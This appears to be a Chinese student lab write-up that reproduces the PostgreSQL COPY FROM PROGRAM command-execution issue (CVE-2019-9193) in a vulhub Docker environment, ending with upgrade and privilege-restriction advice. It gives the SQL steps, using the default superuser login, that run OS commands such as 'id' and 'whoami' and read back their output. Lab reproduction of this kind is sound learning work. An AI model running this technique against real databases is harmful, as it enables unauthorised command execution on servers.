漏洞概述
PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。
影响版本
9.3-11.2
环境搭建
1. 本次漏洞环境使用vulhub中的docker搭建,vulhub下载地址:
GitHub - vulhub/vulhub: Pre-Built Vulnerable Environments Based on Docker-Compose
2.下载完成后使用xftp传入安装有docker和环docker-compose境的虚拟机中解压并启动环境
cd vulhub-master/postgres/CVE-2019-9193
docker-compose up -d
3.使用docker ps查看是否启动成功
4.通过获取ip和映射的端口5432来连接数据库。
启动成功后使用navicat连接数据库,数据库初始账号密码为postgres/
postgres。
漏洞复现
1.执行删除你想用来保存命令输出但是可能存在的表,这一步可有可无
DROP TABLE IF EXISTS cmd_exec
2.创建用来保存命令输出的表:
CREATE TABLE cmd_exec(cmd_output text);
3.通过 “COPY FROM PROGRAM”执行系统命令
COPY cmd_exec FROM PROGRAM 'id'
4.将结果显示出来
SELECT * FROM cmd_exec
5.执行其他命令
whoami
SELECT * FROM cmd_exec
修复建议
1.建议升级至最新版本
2.控制数据库权限禁止普通用户执行命令
此漏洞是根据老师上课讲的知识以及网上的资料将漏洞复现出来,步骤简略,请各位见谅。
